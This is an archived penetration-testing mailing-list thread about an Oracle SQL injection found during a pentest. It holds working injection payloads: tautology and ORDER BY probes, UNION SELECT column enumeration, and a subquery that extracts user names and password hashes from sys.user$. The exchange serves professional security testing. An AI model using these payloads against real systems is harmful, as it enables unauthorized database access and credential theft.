Penetration Testing mailing list archives

Re: Oracle Pentest

From: Dan Crowley <dcrowley () coresecurity com>
Date: Mon, 03 Jan 2011 14:35:12 -0500

This could be a result of your injection string being loaded into
multiple queries, for which there are varying numbers of columns being
selected. There's two options I can think of:

1) Concatenate the column with the results of a subquery, like so:
' || (select rownum ROW, name || '-' || password from sys.user$ where
type#=1 and ROW = 1) || '

2) Use blind SQL injection techniques or, given verbose errors (which
I'm assuming aren't being given to you, otherwise you'd not have to try
to determine the number of columns) use failed conversions to produce
errors like "Sorry, can't turn (value from database) into an integer for
you"

Hope this helps!

PS http://ferruh.mavituna.com/oracle-sql-injection-cheat-sheet-oku/
--
Daniel Crowley, CICP, GCIH
Technical Specialist
Core Security Technologies

"All the forces in the world are not so powerful as an idea whose time
has come." - Victor Hugo

On 1/1/2011 7:48 AM, maash.rajani () gmail com wrote:

I found an injection point during a pentest project.
They are running an Oracle DBMS. 

Simply tryin ' OR '1'='1' returned one single result. In trying to find the number of queries returned by the column 
i used:

' OR '1'='1' ORDER BY n--
Anything above 7 in the Order by query generates an error. So i assumed there were 7 columns being selected.

But then when i try 
' OR '1'='1' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM DUAL --

i get an incorrect number of columns error. I tried anywhere upto 30 "NULLs", i keep getting the same error.

Any suggestions?

------------------------------------------------------------------------
This list is sponsored by: Information Assurance Certification Review Board

Prove to peers and potential employers without a doubt that you can actually do a proper penetration test. IACRB CPT 
and CEPT certs require a full practical examination in order to become certified. 

http://www.iacertification.org
------------------------------------------------------------------------


------------------------------------------------------------------------
This list is sponsored by: Information Assurance Certification Review Board

Prove to peers and potential employers without a doubt that you can actually do a proper penetration test. IACRB CPT 
and CEPT certs require a full practical examination in order to become certified. 

http://www.iacertification.org
------------------------------------------------------------------------

Current thread:

Oracle Pentest maash . rajani (Jan 01)
- Re: Oracle Pentest Dan Crowley (Jan 03)
- Re: Oracle Pentest The Dead (Jan 04)